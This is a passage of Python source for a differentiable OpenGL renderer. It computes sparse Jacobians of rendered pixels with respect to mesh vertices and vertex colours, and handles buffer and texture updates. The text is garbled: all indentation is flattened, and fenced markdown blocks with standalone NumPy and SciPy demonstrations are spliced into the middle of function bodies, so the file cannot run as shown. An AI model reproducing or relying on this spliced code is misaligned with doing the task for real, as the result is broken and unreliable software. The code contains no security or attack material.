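    d2 = np.sum((p - p2) * lnorm12, axis=1)
    intersect = p1 + d[:, None] * lnorm
    # Foot of the perpendicular outside the segment: use the nearer endpoint.
    idx = np.nonzero((d < 0) | (d2 < 0))[0]
    endpoints = np.stack([p1, p2], axis=1)
    pick = np.argmin(np.c_[d[idx], d2[idx]], axis=1)
    intersect[idx] = endpoints[idx, pick]
    return np.linalg.norm(p - intersect, axis=1)

dists = point_segment_distance(
    np.array([[0.5, 1.0], [2.0, 0.0], [-3.0, 4.0]]),
    np.zeros((3, 2)),
    np.tile([1.0, 0.0], (3, 1)))
```

The first point projects onto the segment interior; the other two clamp to an endpoint, exactly as the `nonIntersect` branch above does.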
def compute_derivatives_verts(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
# xdiff = dEdx
# ydiff = dEdy
nVisF = len(visibility.ravel()[visible])
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape(
[nsamples, -1, 2])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
n_norm = self.n_norm
dist = self.dist
linedist = self.linedist
d = self.d
v1 = self.v1
lnorm = self.lnorm
d_final = self.d_final
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
# Computing gradients:
# A multisampled pixel color is given by: w R + (1-w) R' thus:
# 1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
# 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
# 3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
# 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
# 5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
# 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
# 7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
# for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
# Finally, stack data, and IJ of nonbnd with bnd on both dwrt_v and dwrt_vc.
######## 1 derivatives samples outside wrt v 1: (dw * (bar*vc) - dw (bar'*vc') )/ nsamples for face sample
# # #Chumpy autodiff code to check derivatives here:
# chEdgeVerts = ch.Ch(vertsProjBndSamples.reshape([-1,2,2]))
#
# chEdgeVerts1 = chEdgeVerts[:,0,:]
# chEdgeVerts2 = chEdgeVerts[:,1,:]
#
# chSampleVerts = ch.Ch(sampleV.reshape([-1,2]))
# # c1 = (chEdgeVerts1 - chSampleVerts)
# # c2 = (chEdgeVerts2 - chSampleVerts)
# # n = (chEdgeVerts2 - chEdgeVerts1)
#
# #Code to check computation of distance below
# # d2 = ch.abs(c1[:,:,0]*c2[:,:,1] - c1[:,:,1]*c2[:,:,0]) / ch.sqrt((ch.sum(n**2,2)))
# # # np_mat = ch.dot(ch.array([[0,-1],[1,0]]), n)
# # np_mat2 = -ch.concatenate([-n[:,:,1][:,:,None], n[:,:,0][:,:,None]],2)
# # np_vec2 = np_mat2 / ch.sqrt((ch.sum(np_mat2**2,2)))[:,:,None]
# # d2 = d2 / ch.maximum(ch.abs(np_vec2[:,:,0]),ch.abs(np_vec2[:,:,1]))
#
# chl = (chEdgeVerts2 - chEdgeVerts1)
# chlinedist = ch.sqrt((ch.sum(chl**2,axis=1)))[:,None]
# chlnorm = chl/chlinedist
#
# chv1 = chSampleVerts - chEdgeVerts1
#
# chd = chv1[:,0]* chlnorm[:,0] + chv1[:,1]* chlnorm[:,1]
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
# # intersectPointDist1 = intersectPoint - chEdgeVerts1
# # intersectPointDist2 = intersectPoint - chEdgeVerts2
# # Code to check computation of distances below:
# # lengthIntersectToPoint1 = np.linalg.norm(intersectPointDist1.r,axis=1)
# # lengthIntersectToPoint2 = np.linalg.norm(intersectPointDist2.r,axis=1)
#
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
#
# chlineToPoint = (chSampleVerts - chintersectPoint)
# chn_norm = chlineToPoint / ch.sqrt((ch.sum(chlineToPoint ** 2, axis=1)))[:, None]
#
# chdist = chlineToPoint[:,0]*chn_norm[:,0] + chlineToPoint[:,1]*chn_norm[:,1]
#
# # d_final_ch = chdist / ch.maximum(ch.abs(chn_norm[:, 0]), ch.abs(chn_norm[:, 1]))
# d_final_ch = chdist
#
# d_final_ch_weights = sampleColors * (d_final_ch.reshape([self.nsamples, -1]) / ch.sum(d_final_ch.reshape([self.nsamples, -1]), 0))[:,:,None]
#
# d_final_outside = d_final_ch.ravel()
# dwdv = d_final_outside.dr_wrt(chEdgeVerts1)
# rows = np.tile(np.arange(d_final_outside.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_outside.shape[0] * 2)
#
# dwdv_r_v1 = np.array(dwdv[rows, cols]).reshape([-1, 2])
#
# dwdv = d_final_outside.dr_wrt(chEdgeVerts2)
# rows = np.tile(np.arange(d_final_ch.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_ch.shape[0] * 2)
#
# dwdv_r_v2 = np.array(dwdv[rows, cols]).reshape([-1, 2])
nonIntersect = self.nonIntersect
argminDistNonIntersect = self.argminDistNonIntersect
# max_dx_dy = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
d_final_np = dist
# d_final_np = dist / max_dx_dy
ident = np.identity(2)
ident = np.tile(ident[None, :], [len(d_final_np), 1, 1])
dlnorm = (ident - np.einsum('ij,ik->ijk', lnorm, lnorm)) / linedist[:, None]
dl_normdp1 = np.einsum('ijk,ikl->ijl', dlnorm, -ident)
dl_normdp2 = np.einsum('ijk,ikl->ijl', dlnorm, ident)
dv1dp1 = -ident
dv1dp2 = 0
dddp1 = np.einsum('ijk,ij->ik', dv1dp1, lnorm) + np.einsum('ij,ijl->il', v1, dl_normdp1)
dddp2 = 0 + np.einsum('ij,ijl->il', v1, dl_normdp2)
dipdp1 = ident + (dddp1[:, None, :] * lnorm[:, :, None]) + d[:, None, None] * dl_normdp1
dipdp2 = (dddp2[:, None, :] * lnorm[:, :, None]) + d[:, None, None] * dl_normdp2
#good up to here.
dndp1 = -dipdp1
dndp2 = -dipdp2
dn_norm = (ident - np.einsum('ij,ik->ijk', n_norm, n_norm)) / dist[:, None]
# dn_normdp1 = np.einsum('ijk,ikl->ijl', dn_norm, dndp1)
# dn_normdp2 = np.einsum('ijk,ikl->ijl', dn_norm, dndp2)
ddistdp1 = np.einsum('ij,ijl->il', n_norm, dndp1)
ddistdp2 = np.einsum('ij,ijl->il', n_norm, dndp2)
# argmax_nx_ny = np.argmax(np.abs(n_norm), axis=1)
# dmax_nx_ny_p1 = np.sign(n_norm)[np.arange(len(n_norm)), argmax_nx_ny][:, None] * dn_normdp1[np.arange(len(dn_normdp1)), argmax_nx_ny]
# dmax_nx_ny_p2 = np.sign(n_norm)[np.arange(len(n_norm)), argmax_nx_ny][:, None] * dn_normdp2[np.arange(len(dn_normdp2)), argmax_nx_ny]
# dd_final_dp1 = -1. / max_dx_dy[:, None] ** 2 * dmax_nx_ny_p1 * dist + 1. / max_dx_dy[:, None] * ddistdp1
# dd_final_dp2 = -1. / max_dx_dy[:, None] ** 2 * dmax_nx_ny_p2 * dist + 1. / max_dx_dy[:, None] * ddistdp2
dd_final_dp1 = ddistdp1
dd_final_dp2 = ddistdp2
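# The dlnorm / dn_norm terms above are instances of the Jacobian of vector
# normalization, d(v/|v|)/dv = (I - n n^T)/|v| with n = v/|v|. A standalone,
# illustrative finite-difference check of that identity (not part of the renderer):

```python
import numpy as np

def normalize_jacobian(v):
    # d(v/|v|)/dv = (I - n n^T) / |v|, with n = v/|v|
    norm = np.linalg.norm(v)
    n = v / norm
    return (np.eye(len(v)) - np.outer(n, n)) / norm

v = np.array([3.0, 4.0])
J = normalize_jacobian(v)

# finite-difference check of the analytic Jacobian
eps = 1e-6
J_fd = np.zeros((2, 2))
for k in range(2):
    dv = np.zeros(2)
    dv[k] = eps
    J_fd[:, k] = ((v + dv) / np.linalg.norm(v + dv) - v / np.linalg.norm(v)) / eps

assert np.allclose(J, J_fd, atol=1e-5)
```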
# For those non intersecting points straight to the edge:
v1 = self.v1[nonIntersect][argminDistNonIntersect == 0]
v1_norm = v1 / np.sqrt((np.sum(v1 ** 2, axis=1)))[:, None]
dd_final_dp1_nonintersect = -v1_norm
v2 = self.v2[nonIntersect][argminDistNonIntersect == 1]
v2_norm = v2 / np.sqrt((np.sum(v2 ** 2, axis=1)))[:, None]
dd_final_dp2_nonintersect = -v2_norm
# NB: chained fancy indexing (a[mask][idx] = v) assigns into a temporary copy
# and is silently dropped, so the indices are composed explicitly first.
nonIntersectIdx = np.arange(len(dd_final_dp1))[nonIntersect]
dd_final_dp1[nonIntersectIdx[argminDistNonIntersect == 0]] = dd_final_dp1_nonintersect
dd_final_dp1[nonIntersectIdx[argminDistNonIntersect == 1]] = 0
dd_final_dp2[nonIntersectIdx[argminDistNonIntersect == 1]] = dd_final_dp2_nonintersect
dd_final_dp2[nonIntersectIdx[argminDistNonIntersect == 0]] = 0
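# NumPy fancy indexing returns a copy, so chained assignments of the form
# a[mask][idx] = v are silently dropped; the indices must be composed before
# assigning. A standalone demonstration of the pitfall:

```python
import numpy as np

a = np.arange(6, dtype=float)
mask = a > 2            # boolean mask -> fancy indexing returns a copy

# Chained assignment writes into a temporary copy and is silently lost:
a[mask][:2] = -1.0
assert np.array_equal(a, np.arange(6, dtype=float))  # a is unchanged

# Composing the indices first writes into the original array:
idx = np.arange(len(a))[mask][:2]
a[idx] = -1.0
assert np.array_equal(a, [0., 1., 2., -1., -1., 5.])
```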
dd_final_dp1_weighted_part1 = -self.d_final[:,None]* np.tile(dd_final_dp1.reshape([self.nsamples, -1, 2]).sum(0)[None,:,:],[self.nsamples,1,1]).reshape([-1, 2])/(np.tile(self.d_final_total[None,:], [self.nsamples, 1,1]).reshape([-1,1])**2)
dd_final_dp1_weighted_part2 = dd_final_dp1 / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1])
dd_final_dp1_weighted = dd_final_dp1_weighted_part1 + dd_final_dp1_weighted_part2
dd_final_dp2_weighted_part1 = -self.d_final[:,None]*np.tile(dd_final_dp2.reshape([self.nsamples, -1, 2]).sum(0)[None,:,:],[self.nsamples,1,1]).reshape([-1, 2])/(np.tile(self.d_final_total[None,:], [self.nsamples, 1,1]).reshape([-1,1])**2)
dd_final_dp2_weighted_part2 = dd_final_dp2 / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1])
dd_final_dp2_weighted = dd_final_dp2_weighted_part1 + dd_final_dp2_weighted_part2
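# The *_weighted_part1 / *_weighted_part2 split above is the quotient rule for
# normalized weights w_i = d_i / sum_j d_j, i.e. dw_i/dd_j = delta_ij/total - d_i/total**2.
# A standalone finite-difference check of that Jacobian (illustrative only):

```python
import numpy as np

d = np.array([0.2, 0.5, 0.3])
total = d.sum()
w = d / total

# Analytic Jacobian: dw_i/dd_j = delta_ij / total - d_i / total**2
J = np.eye(len(d)) / total - np.outer(d, np.ones(len(d))) / total**2

# finite-difference check
eps = 1e-7
J_fd = np.zeros((3, 3))
for j in range(3):
    dd = np.zeros(3)
    dd[j] = eps
    J_fd[:, j] = ((d + dd) / (d + dd).sum() - w) / eps

assert np.allclose(J, J_fd, atol=1e-5)
```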
if self.imageGT is None:
dImage_wrt_outside_v1 = sampleColors.reshape([-1,3,1]) * dd_final_dp1_weighted[:, None, :]
dImage_wrt_outside_v2 = sampleColors.reshape([-1,3,1]) * dd_final_dp2_weighted[:, None, :]
else:
dImage_wrt_outside_v1 = self.sampleResiduals.reshape([-1,3,1])**2 * dd_final_dp1_weighted[:, None, :]
dImage_wrt_outside_v2 = self.sampleResiduals.reshape([-1,3,1])**2 * dd_final_dp2_weighted[:, None, :]
# sampleV
# z = dd_final_dp1.reshape([8, -1, 2])
# eq = np.array([np.all(np.sign(z[:, i, :]) == -1) or np.all(np.sign(z[:, i, :]) == 1) for i in range(z.shape[1])])
# dist_ns = dist.reshape([8,-1])
# rightV = sampleV[0, :, 0] > np.max(sampleV[0, :, :], 0)[0] - 1
# dist_ns[0, rightV]
# dImage_wrt_outside_v1.reshape([8, -1, 3, 2])[0, rightV,:]
# d_final_ch_weights
# self.finalColorBnd
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 2 * 2)).ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()
faces = np.tile(faces.reshape([1, -1, 2]), [self.nsamples, 1, 1]).ravel()
JS = col(faces)
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data1 = dImage_wrt_outside_v1.transpose([1, 0, 2])
data2 = dImage_wrt_outside_v2.transpose([1, 0, 2])
data = np.concatenate([data1[:, :, None, :], data2[:, :, None, :]], 2)
data = data.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
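# The (data, ij) constructor above sums duplicate (row, col) entries when
# converting to CSC, which is how per-sample gradient contributions for the
# same pixel/vertex pair accumulate without an explicit reduction. A standalone
# demonstration:

```python
import numpy as np
import scipy.sparse as sp

data = np.array([1.0, 2.0, 3.0])
rows = np.array([0, 0, 1])
cols = np.array([2, 2, 0])
ij = np.vstack((rows, cols))

# Duplicate (row, col) pairs are summed on conversion to CSC.
J = sp.csc_matrix((data, ij), shape=(2, 3))
assert J[0, 2] == 3.0   # 1.0 + 2.0 accumulated
assert J[1, 0] == 3.0
```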
######## 2 derivatives samples wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
verticesBnd = self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3])
sampleBarycentricBar = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([-1, 3, 1])
verts = np.sum(self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3, 3]) * sampleBarycentricBar, axis=1)
dImage_wrt_bar_v = self.barycentricDerivatives(verticesBnd, f[sampleFaces.ravel()], verts).swapaxes(0, 1)
if self.imageGT is None:
# dImage_wrt_bar_v = dImage_wrt_bar_v * d_final[:, None, None, None] * self.t_area_bnd[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
dImage_wrt_bar_v = dImage_wrt_bar_v * d_final[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# areaTotal = np.tile(self.areaWeightsTotal[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# d_final_total = np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# dImage_wrt_bar_v = self.areaWeights.reshape([-1,1,1,1]) * dImage_wrt_bar_v * d_final[:, None, None, None] / (areaTotal*d_final_total)
else:
dImage_wrt_bar_v = 2*self.sampleResiduals.reshape([-1,3])[:,:,None,None] * dImage_wrt_bar_v * d_final[:, None, None, None] * self.t_area_bnd[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
### Derivatives wrt V: 2 derivatives samples wrt v bar: (w * (dbar*vc) )/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 2 * f.shape[1])).ravel()
faces = f[sampleFaces].ravel()
JS = col(faces)
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v, [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd_bar = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
vertsPerFaceProjBnd = self.camera.r[f[nonBoundaryFaces].ravel()].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_nonbnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_nonbnd[t_area_nonbnd > 1] = 1
bc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
verts = np.sum(self.v.r[f[nonBoundaryFaces.ravel()].ravel()].reshape([-1, 3, 3]) * bc[:, :, None], axis=1)
didp = self.barycentricDerivatives(verticesNonBnd, f[nonBoundaryFaces.ravel()], verts)
# didp = didp * t_area_nonbnd[None, :, None, None]
if self.imageGT is not None:
didp = 2 * self.residuals[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3)).T[:, :, None, None] * didp * t_area_nonbnd[None, :, None, None]
n_channels = np.atleast_3d(observed).shape[2]
####### 2: Take the data and copy the corresponding dxs and dys to these new pixels.
### Derivatives wrt V:
pixels = np.where(((~boundaryImage) & (visibility != 4294967295)).ravel())[0]
IS = np.tile(col(pixels), (1, 2 * f.shape[1])).ravel()
JS = col(f[nonBoundaryFaces].ravel())
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = didp.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_nonbnd = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
if np.any(boundaryImage):
result_wrt_verts = result_wrt_verts_bnd + result_wrt_verts_bnd_bar + result_wrt_verts_nonbnd
else:
result_wrt_verts = result_wrt_verts_nonbnd
return result_wrt_verts
def compute_derivatives_vc(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
d_final = self.d_final
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)  # 4294967295 == 2**32 - 1 marks background pixels
zerosIm = np.ones(self.boundarybool_image.shape, dtype=bool)  # all-True mask, kept for the legacy indexing below
nsamples = self.nsamples
bndPixelMask = (zerosIm * boundaryImage).ravel().astype(bool)
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, bndPixelMask].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, bndPixelMask, :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
# Computing gradients:
# A multisampled pixel color is given by: w R + (1-w) R' thus:
# 1 derivatives samples wrt v 1: (dw * (bar*vc) - dw (bar'*vc') )/ nsamples for face sample
# 2 derivatives samples wrt v bar: (w * (dbar*vc) )/ nsamples for faces sample
# 4 derivatives samples wrt vc : (w * (bar) )/ nsamples for faces sample
# for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
####### 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
dImage_wrt_bnd_vc = d_final[:, None] * sampleBarycentric.reshape([-1, 3]) / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1])
if self.imageGT is not None:
dImage_wrt_bnd_vc = 2 * self.sampleResiduals.reshape([-1, 3]).T[:, :, None] * dImage_wrt_bnd_vc[None, :]
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces].ravel()
JS = col(faces)
data = dImage_wrt_bnd_vc.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
if self.imageGT is None:
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_bnd = result
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.where(((~boundaryImage) & (visibility != 4294967295)).ravel())[0]
IS = np.tile(col(pixels), (1, 3)).ravel()
JS = col(f[nonBoundaryFaces].ravel())
dImage_wrt_nonbnd_vc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
if self.imageGT is not None:
dImage_wrt_nonbnd_vc = 2 * self.residuals[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3)).T[:, :, None] * dImage_wrt_nonbnd_vc[None, :]
data = np.asarray(dImage_wrt_nonbnd_vc, order='C').ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
if self.imageGT is None:
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_nonbnd = result
if np.any(boundaryImage):
result_wrt_vc = result_wrt_vc_bnd + result_wrt_vc_nonbnd
else:
result_wrt_vc = result_wrt_vc_nonbnd
return result_wrt_vc
def on_changed(self, which):
super().on_changed(which)
if 'v' in which or 'camera' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_verts_mesh[mesh][polygons].set_array(verts_by_face.astype(np.float32))
self.vbo_verts_mesh[mesh][polygons].bind()
if 'vc' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
flen = 1
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
# fc = np.arange(flen, flen + len(f))
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
self.vbo_face_ids_list[mesh][polygons].set_array(fc)
self.vbo_face_ids_list[mesh][polygons].bind()
flen += len(f)
self.vbo_indices_mesh_list[mesh][polygons].set_array(np.array(self.f_list[mesh][polygons]).astype(np.uint32))
self.vbo_indices_mesh_list[mesh][polygons].bind()
if 'texture_stack' in which:
# gl = self.glf
# texture_data = np.array(self.texture_image*255., dtype='uint8', order='C')
# self.release_textures()
#
# for mesh in range(len(self.f_list)):
# textureIDs = []
# for polygons in range(len(self.f_list[mesh])):
# texture = None
# if self.haveUVs_list[mesh][polygons]:
# texture = GL.GLuint(0)
# GL.glGenTextures( 1, texture )
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# #Send texture.
# #Pol: Check if textures are float or uint from Blender import.
# image = (self.textures_list[mesh][polygons]*255.0).astype(np.uint8)
# GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB8, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image)
# textureIDs = textureIDs + [texture]
# self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs]
# gl.GenTextures(1, tmp) # TODO: free after done
# self.textureID = tmp[0]
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size + textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE,
image.tobytes())  # ndarray.tostring() is deprecated; a C-contiguous uint8 image uploads as raw bytes
# if 'imageGT' in which:
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# # GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGBA, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
if any(attr in which for attr in ('v', 'f', 'vc', 'ft', 'camera', 'texture_stack', 'imageGT')):
self.render_image_buffers()
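# Dirty-flag checks like the ones in on_changed are easy to get wrong in Python:
# a chained test such as 'v' or 'camera' in which parses as ('v') or ('camera' in which),
# which is always truthy because a non-empty string literal is truthy. The
# membership test must be applied per attribute. A standalone demonstration:

```python
which = set()

# Parses as ('v') or ('camera' in which) and short-circuits to 'v':
assert ('v' or 'camera' in which) == 'v'

# The intended test, spelled out per attribute:
assert not ('v' in which or 'camera' in which)
assert any(attr in which for attr in ('v', 'camera')) is False
```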
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture is not None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
@depends_on(dterms + terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
return no_overdraw
# if not self.overdraw:
# return no_overdraw
#
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
# overdraw = self.draw_color_image()
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
#
# # return overdraw * np.atleast_3d(self.boundarybool_image)
#
# boundarybool_image = self.boundarybool_image
# if self.num_channels > 1:
# boundarybool_image = np.atleast_3d(boundarybool_image)
#
